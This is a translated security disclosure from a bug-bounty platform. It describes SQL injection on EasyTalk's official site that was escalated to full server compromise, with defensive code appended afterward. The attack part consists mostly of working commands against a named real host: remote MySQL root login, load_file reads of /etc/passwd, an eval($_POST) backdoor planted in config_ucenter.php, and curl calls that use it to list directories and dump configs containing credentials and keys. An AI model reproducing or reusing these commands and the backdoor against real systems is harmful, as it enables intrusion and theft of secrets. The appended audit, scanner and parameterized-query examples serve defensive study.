SQL injection on the EasyTalk official main site (server can be fully compromised)

Vulnerability details

Disclosure status:

2014-02-12: Details sent to the vendor, awaiting vendor handling
2014-02-12: Vendor has confirmed; details disclosed to the vendor only
2014-02-22: Details disclosed to core white hats and experts in the relevant field
2014-03-04: Details disclosed to regular white hats
2014-03-14: Details disclosed to intern white hats
2014-03-29: Details disclosed to the public

Brief description:

Raise security awareness...

Detailed description:

qiufeng@ubuntu:/tmp$ ping www.nextsns.com
PING www.nextsns.com (58.49.57.112) 56(84) bytes of data.
64 bytes from 58.49.57.112: icmp_req=1 ttl=55 time=17.4 ms



http://www.nextsns.com:80/et/?hjoeson*

SQL injection exists; data can be extracted.

MySQL superuser (root) password leaked:
root *4C5F36D8E964919[马赛克]687CF45CF4CD3A2C

Remote login is possible; looking the hash up on cmd5 gives the plaintext yo********n3
mysql -uroot -h 58.49.57.112 -p

select load_file("/etc/passwd");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
www:x:501:501::/home/www:/sbin/nologin


select load_file("/etc/sysconfig/network-scripts/ifcfg-eth0");
DEVICE=eth0
BOOTPROTO=none
HWADDR=bc:ae:c5:5f:18:81
NM_CONTROLLED=yes
ONBOOT=yes
TYPE=Ethernet
UUID="542e47b5-9841-43c1-8656-a7bc17229a58"
IPADDR=58.49.57.112
NETMASK=255.255.255.128
DNS2=202.103.44.150
GATEWAY=58.49.57.1
DNS1=202.103.24.68
IPV6INIT=no
USERCTL=no


select load_file("/etc/sysconfig/network-scripts/ifcfg-eth1");
DEVICE=eth1
BOOTPROTO=dhcp
HWADDR=BC:AE:C5:5F:17:90
NM_CONTROLLED=yes
ONBOOT=no
TYPE=Ethernet
UUID="dd967db4-77f0-41f8-8c18-91b5bed1959d"
IPV6INIT=no
USERCTL=no

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| etCms |
| etauthsite |
| etbbs |
| etnew |
| etwiki |
| fengkuang |
| fkcxhbbs |
| mygame2 |
| mysql |
| pcgame |
| performance_schema |
| richman |
| richman2 |
| webxiaohua |
| xiaohua |
| xiaohuaweb |
| youxiqunbbs |
+--------------------+
18 rows in set (0.02 sec)
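The steps above (remote root login, `load_file()` reading `/etc/passwd` and the interface configs, then enumerating every database) all depend on MySQL account settings that fix items 3 and 4 address. The following is an added example, not code from the original report or from EasyTalk/Discuz: a small audit over `mysql.user`-style rows that flags a root account reachable from the network, accounts holding the FILE privilege remotely (which is what `load_file()` needs), accounts without a password, a web application connecting as root, and an empty `secure_file_priv`. All account rows and variable values are constructed sample data; the `youxiqunbbs` database name is the one shown on this page, and the `bbs_app` user and remediation SQL are hypothetical.

```python
from dataclasses import dataclass

# Hosts from which a login is considered local rather than network-reachable.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


@dataclass(frozen=True)
class MysqlAccount:
    """One row in the shape of SELECT User, Host, File_priv, ... FROM mysql.user."""
    user: str
    host: str
    file_priv: bool      # mysql.user.File_priv == 'Y'
    has_password: bool   # authentication_string / Password column non-empty


def audit_mysql(accounts, secure_file_priv, app_db_user):
    """Return a list of (finding, remediation) tuples for the given settings.

    accounts        -- iterable of MysqlAccount
    secure_file_priv -- value of SHOW VARIABLES LIKE 'secure_file_priv'
    app_db_user     -- the MySQL user the web application connects as
    Remediation strings use MySQL 5.7+ syntax and are suggestions, not executed.
    """
    findings = []
    for a in accounts:
        remote = a.host not in LOCAL_HOSTS
        if a.user == "root" and remote:
            findings.append((f"root@'{a.host}' can log in from the network (fix 3)",
                             f"DROP USER 'root'@'{a.host}';"))
        elif a.file_priv and remote:
            findings.append((f"'{a.user}'@'{a.host}' holds FILE, so load_file() works remotely",
                             f"REVOKE FILE ON *.* FROM '{a.user}'@'{a.host}';"))
        if not a.has_password:
            findings.append((f"'{a.user}'@'{a.host}' has no password",
                             f"ALTER USER '{a.user}'@'{a.host}' IDENTIFIED BY '<new password>';"))
    if app_db_user == "root":
        findings.append(("the web application connects as root (fix 4)",
                         "CREATE USER 'bbs_app'@'127.0.0.1' IDENTIFIED BY '<new password>'; "
                         "GRANT SELECT, INSERT, UPDATE, DELETE ON youxiqunbbs.* "
                         "TO 'bbs_app'@'127.0.0.1';"))
    if not secure_file_priv:
        findings.append(("secure_file_priv is empty: load_file()/INTO OUTFILE can touch any "
                         "path mysqld can read",
                         "-- my.cnf, [mysqld] section: secure_file_priv=/var/lib/mysql-files"))
    return findings


# Constructed sample rows modelling the state described in the report.
SAMPLE_ACCOUNTS = [
    MysqlAccount("root", "localhost", True, True),
    MysqlAccount("root", "%", True, True),          # remote root, as exploited above
    MysqlAccount("backup", "%", True, True),        # FILE privilege from anywhere
    MysqlAccount("report", "%", False, False),      # no password at all
    MysqlAccount("bbs_app", "127.0.0.1", False, True),
]

# Constructed rows after applying fix items 3 and 4.
HARDENED_ACCOUNTS = [
    MysqlAccount("root", "localhost", True, True),
    MysqlAccount("bbs_app", "127.0.0.1", False, True),
]

if __name__ == "__main__":
    for text, sql in audit_mysql(SAMPLE_ACCOUNTS, "", "root"):
        print(f"[!] {text}\n    {sql}")
    print("hardened findings:", audit_mysql(HARDENED_ACCOUNTS, "/var/lib/mysql-files", "bbs_app"))
```

The audit deliberately treats `root@localhost` holding FILE as acceptable and only reports FILE on network-reachable accounts; with `secure_file_priv` set, even a remote account with FILE can no longer read arbitrary paths such as `/etc/passwd`.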



From the pre_ucenter_applications table in the youxiqunbbs database the uc_key can be obtained; it belongs to the Discuz forum at bbs.youxiqun.com.

With uc_key in hand, the server is mine (that damned /config/config_ucenter.php again)!!!

#1 Listing directories

The server apparently does not support the scandir function, so the old method has to be used.

By changing the path passed to opendir, the server's directories can be walked.



curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';

Listing /home
Array
(
[0] => .
[1] => ..
[2] => java
[3] => lost+found
[4] => mygame.tar.gz
[5] => mysql
[6] => richman.tar.gz
[7] => richman2.tar.gz
[8] => www
[9] => wwwlogs
[10] => xhmain.tar.gz
[11] => xiaohua.tar.gz
[12] => xiaohuadb.tar.gz
[13] => youxiqunbbs.tar.gz
[14] => youxiqunbbsdb.tar.gz
)

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
Listing /home/www
Array
(
[0] => .
[1] => ..
[2] => .pki
[3] => cxh.tar.gz
[4] => fkcxh
[5] => fkcxh1
[6] => fkcxhbbs
[7] => fkcxhbbs_ys
[8] => html5
[9] => nextsns.com
[10] => penfu
[11] => smile.zip
[12] => webxiaohua
[13] => youxiqunbbs
)

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=$dh=opendir("/home/www/nextsns.com/download");while (false !== ($filename = readdir($dh))){$files[] = $filename;}sort($files);print_r($files);';
Listing /home/www/nextsns.com/download
Array
(
[0] => .
[1] => ..
[2] => EasyTalk_Development_Guide.pdf
[3] => EasyTalk_X1.3.rar
[4] => EasyTalk_X1.4.rar
[5] => EasyTalk_X1.5.rar
[6] => EasyTalk_X1.6.rar
[7] => EasyTalk_X1.7.rar
[8] => EasyTalk_X1.8.rar
[9] => EasyTalk_X2.0.1.rar
[10] => EasyTalk_X2.0.2.rar
[11] => EasyTalk_X2.0.rar
[12] => EasyTalk_X2.1.zip
[13] => EasyTalk_X2.1_Beta2_20120813.zip
[14] => EasyTalk_X2.2.1.zip
[15] => EasyTalk_X2.2.2.zip
[16] => EasyTalk_X2.2.zip
[17] => EasyTalk_X2.3.zip
[18] => EasyTalk_X2.4.zip
[19] => EasyTalk_for_android_v1.0.apk
[20] => EasyTalk_for_ios_v1.0.ipa
[21] => EasyTalk_for_ios_v1.1.ipa
[22] => EasyTalk_manual.pdf
[23] => EasyTalk�����ĵ�.rar
[24] => EasyTalk�ֻ����ز��ĵ�.docx
[25] => EasyTalk���ݿ��ṹ.pdf
[26] => EasyTalk΢����ʹ���ֲ�.pdf
[27] => EasyTalkϵͳ�ṹ.pdf
[28] => easytalk_php_sdk_v1.0.zip
[29] => install_manual.rar
[30] => msyh.ttf
[31] => update_1.5.rar
[32] => update_1.5_20110517.rar
[33] => update_1.6.rar
[34] => update_1.7.rar
[35] => update_1.8.rar
[36] => update_2.0.1.rar
[37] => update_2.0.2.rar
[38] => update_2.0.rar
)





#2 Sensitive information files

curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_ucenter.php"));'
<?php


define('UC_CONNECT', 'mysql');

define('UC_DBHOST', '127.0.0.1');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'yo[马赛克]3');
define('UC_DBNAME', 'youxiqunbbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`youxiqunbbs`.pre_ucenter_');
define('UC_DBCONNECT', 0);

define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'S2m9bcbfT4Ua[马赛克]AdTcxd0242g737dbe4kauaubn2pb');
define('UC_API', 'http://aaa');eval($_POST[QF]);//');
define('UC_APPID', '1');
define('UC_IP', '');
define('UC_PPP', 20);


curl "http://bbs.youxiqun.com/config/config_ucenter.php" --data 'QF=print_r(file_get_contents("./config_global.php"));'
<?php


$_config = array();

// ---------------------------- CONFIG DB ----------------------------- //
$_config['db']['1']['dbhost'] = '127.0.0.1';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'y[马赛克]3';
$_config['db']['1']['dbcharset'] = 'utf8';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'youxiqunbbs';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';
$_config['db']['slave'] = '';

// -------------------------- CONFIG MEMORY --------------------------- //
$_config['memory']['prefix'] = 'ayRtDS_';
$_config['memory']['redis']['server'] = '';
$_config['memory']['redis']['port'] = 6379;
$_config['memory']['redis']['pconnect'] = 1;
$_config['memory']['redis']['timeout'] = '0';
$_config['memory']['redis']['serializer'] = 1;
$_config['memory']['redis']['requirepass'] = '';
$_config['memory']['memcache']['server'] = '';
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 1;
$_config['memory']['xcache'] = 1;
$_config['memory']['eaccelerator'] = 1;
$_config['memory']['wincache'] = 1;

// -------------------------- CONFIG SERVER --------------------------- //
$_config['server']['id'] = 1;

// ------------------------- CONFIG DOWNLOAD -------------------------- //
$_config['download']['readmod'] = 2;
$_config['download']['xsendfile']['type'] = '0';
$_config['download']['xsendfile']['dir'] = '/down/';

// --------------------------- CONFIG CACHE --------------------------- //
$_config['cache']['type'] = 'sql';

// -------------------------- CONFIG OUTPUT --------------------------- //
$_config['output']['charset'] = 'utf-8';
$_config['output']['forceheader'] = 1;
$_config['output']['gzip'] = '0';
$_config['output']['tplrefresh'] = 1;
$_config['output']['language'] = 'zh_cn';
$_config['output']['staticurl'] = 'static/';
$_config['output']['ajaxvalidate'] = '0';
$_config['output']['iecompatible'] = '0';

// -------------------------- CONFIG COOKIE --------------------------- //
$_config['cookie']['cookiepre'] = 'F57B_';
$_config['cookie']['cookiedomain'] = '';
$_config['cookie']['cookiepath'] = '/';

// ------------------------- CONFIG SECURITY -------------------------- //
$_config['security']['authkey'] = 'd648ed1kHi0uJuZa';
$_config['security']['urlxssdefend'] = 1;
$_config['security']['attackevasive'] = '0';
$_config['security']['querysafe']['status'] = 1;
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['3'] = 'if';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['3'] = '(select';
$_config['security']['querysafe']['daction']['4'] = 'unionall';
$_config['security']['querysafe']['daction']['5'] = 'uniondistinct';
$_config['security']['querysafe']['daction']['6'] = 'uniondistinct';
$_config['security']['querysafe']['dnote']['0'] = '/*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
$_config['security']['querysafe']['dnote']['4'] = '"';
$_config['security']['querysafe']['dlikehex'] = 1;
$_config['security']['querysafe']['afullnote'] = '0';

// -------------------------- CONFIG ADMINCP -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
$_config['admincp']['founder'] = '1';
$_config['admincp']['forcesecques'] = '0';
$_config['admincp']['checkip'] = 1;
$_config['admincp']['runquery'] = '0';
$_config['admincp']['dbimport'] = 1;

// -------------------------- CONFIG REMOTE --------------------------- //
$_config['remote']['on'] = '0';
$_config['remote']['dir'] = 'remote';
$_config['remote']['appkey'] = '62cf0b3c3e6a4c9468e7216839721d8e';
$_config['remote']['cron'] = '0';

// --------------------------- CONFIG INPUT --------------------------- //
$_config['input']['compatible'] = 1;


// ------------------- THE END -------------------- //

?>
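The dumped config_ucenter.php above shows how the uc_key was turned into code execution: the `UC_API` define has been rewritten so that extra PHP (`eval($_POST[QF]);`) sits after the closing `);` on the same line, hidden behind a `//` comment. A defender reviewing a Discuz install wants to catch exactly that shape. The following is an added example, not code from the original report or from Discuz: a scanner that parses each `define(...)` in a UCenter config, flags any code that follows the statement on the same line, flags well-known dangerous tokens anywhere in the file, and diffs the file against a known-good baseline. Both config texts are constructed samples; the key, password, hostname and user in them are placeholders, not values from the compromised server.

```python
import difflib
import re

# One PHP define('NAME', value); statement, capturing whatever follows the ");".
DEFINE_RE = re.compile(
    r"""^\s*define\(\s*'(?P<name>\w+)'\s*,\s*"""
    r"""(?P<value>'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"|[^)]*?)\s*\)\s*;(?P<rest>.*)$"""
)

# Tokens that have no business in a configuration file of plain define() calls.
SUSPICIOUS_RE = re.compile(
    r"\beval\s*\(|\$_(?:POST|GET|REQUEST|COOKIE)\b|\bassert\s*\(|\bbase64_decode\s*\("
    r"|\b(?:system|exec|shell_exec|passthru|popen)\s*\("
)


def scan_config(php_source):
    """Return [(line_number, reason)] for lines that look tampered with."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        m = DEFINE_RE.match(line)
        if m:
            rest = m.group("rest").strip()
            # Only a comment may follow a define(); any other trailing text is code.
            if rest and not rest.startswith(("//", "#", "/*")):
                findings.append((lineno, f"code after define('{m.group('name')}'): {rest}"))
        hit = SUSPICIOUS_RE.search(line)
        if hit:
            findings.append((lineno, f"suspicious token: {hit.group(0)}"))
    return findings


def diff_against_baseline(baseline, current):
    """Changed lines (prefixed +/-) between a known-good copy and the live file."""
    return [
        l for l in difflib.unified_diff(baseline.splitlines(), current.splitlines(),
                                        lineterm="", n=0)
        if l.startswith(("+", "-")) and not l.startswith(("+++", "---"))
    ]


# Constructed known-good config; every value is a placeholder.
CLEAN_CONFIG = r"""<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '127.0.0.1');
define('UC_DBUSER', 'bbs_app');
define('UC_DBPW', 'example-password');
define('UC_DBNAME', 'youxiqunbbs');
define('UC_KEY', 'EXAMPLE_UC_KEY_PLACEHOLDER');
define('UC_API', 'http://bbs.example.com/uc_server');
define('UC_APPID', '1');
define('UC_PPP', 20);
"""

# The same file with the UC_API line rewritten in the shape shown in the report.
BACKDOORED_CONFIG = CLEAN_CONFIG.replace(
    "define('UC_API', 'http://bbs.example.com/uc_server');",
    "define('UC_API', 'http://aaa');eval($_POST[QF]);//');",
)

if __name__ == "__main__":
    for lineno, reason in scan_config(BACKDOORED_CONFIG):
        print(f"line {lineno}: {reason}")
    print(diff_against_baseline(CLEAN_CONFIG, BACKDOORED_CONFIG))
```

The pattern check catches the injection even when the payload is something other than `eval`, because a legitimate UCenter config never has code after a `define();`. The baseline diff is the stronger control where a known-good copy exists (for example from version control or a deployment artifact), and rotating `UC_KEY` (fix 2) is what stops the file from being rewritten again through the same path.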

Proof of vulnerability:

[Screenshot: _829.png]

[Screenshot: 11.jpg]

Fix recommendations:

1. Effectively filter all user-supplied data before it reaches the database.

2. Rotate the uc_key.

3. Close MySQL to access from the public internet.

4. Do not let the PHP application connect to the database directly as the root user.

5. Host the EasyTalk source code with a third party, such as Google!
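Fix item 1 is the root cause fix: the injection at `/et/?hjoeson*` exists because a request parameter is pasted into SQL text. The following is an added example, not code from the original report or from EasyTalk: the injectable pattern beside its parameterized replacement, run against a constructed in-memory SQLite table so the difference is visible without a MySQL server. The table, rows and the `lookup_*` functions are all hypothetical; with MySQL drivers such as PyMySQL the placeholder is `%s` instead of `?`, but the principle is the same.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for an application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"),
         ("bob", "bob@example.com"),
         ("carol", "carol@example.com")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """The injectable pattern: the parameter becomes part of the SQL text."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Fixed: the parameter is bound as data and can never change the query shape."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


def parse_id(raw):
    """Allow-list validation for values that cannot be bound, e.g. numeric ids
    used in ORDER BY or LIMIT: accept only a plain decimal integer."""
    if not raw.isdigit():
        raise ValueError(f"rejected id parameter: {raw!r}")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    probe = "bob' OR 'a'='a"        # a tautology that turns a one-row lookup into a dump
    print("vulnerable:    ", lookup_vulnerable(db, probe))
    print("parameterized: ", lookup_parameterized(db, probe))
    print("parse_id('42') =", parse_id("42"))
```

The vulnerable function returns every row for the probe input because the quote closes the literal and the rest is parsed as SQL; the parameterized function looks for a user literally named `bob' OR 'a'='a` and returns nothing. Escaping functions are a weaker substitute than binding; filtering (fix 1) should mean binding for values and allow-listing for anything that cannot be bound.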

Copyright notice: when reposting, please credit the source: 秋风@乌云 (Qiufeng@WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2014-02-12 17:03

Vendor reply:

Being fixed

Latest status:

None yet


Vulnerability rating: